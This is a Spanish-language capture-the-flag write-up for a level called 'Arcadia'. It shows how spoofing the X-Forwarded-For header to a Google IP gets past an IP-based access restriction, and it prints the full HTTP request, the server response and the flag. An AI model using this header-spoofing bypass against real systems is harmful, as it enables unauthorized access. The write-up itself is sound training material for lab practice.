## Level 2 - Arcadia
>URL del reto: 94.140.114.24:8080/level2

La primera toma de contacto con este reto ha sido ignorar por completo el mensaje que muestra la web, e intentar localizar directorios mediante fuerza bruta.
Como esto ha sido absurdo, hemos vuelto al mensaje principal, y ahora sí, le hemos hecho caso.

    -- This site is available for google employees only, you need to access it FROM the google local network / vpn / proxy --

Modificamos la petición original para hacer creer al servidor que estamos dentro de la organización, para conseguir esto, añadimos la cabecera 
``X-Forwarded-For: 8.8.8.8``
Con esta pequeña modificación, obtenemos la flag en la respuesta.
**Petición modificada** 

    GET /level2/index.php HTTP/1.1
    Host: 94.140.114.24:8080
    X-Forwarded-For: 8.8.8.8
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1

**Respuesta obtenida**

    HTTP/1.1 200 OK
    Date: Mon, 16 Mar 2020 19:32:17 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 220
    Connection: close
    Content-Type: text/html; charset=UTF-8

    <title>GOGGGGGGGGGGGGGGGgle</title>
    <center>
    <h2>This site is available for google employees only, you need to access it FROM the google local network / vpn / proxy</h2>
    flag{da3e88f1b14f9345c7e0545e7e496981}
    </center>

Obtenemos la flag:
**flag{da3e88f1b14f9345c7e0545e7e496981}**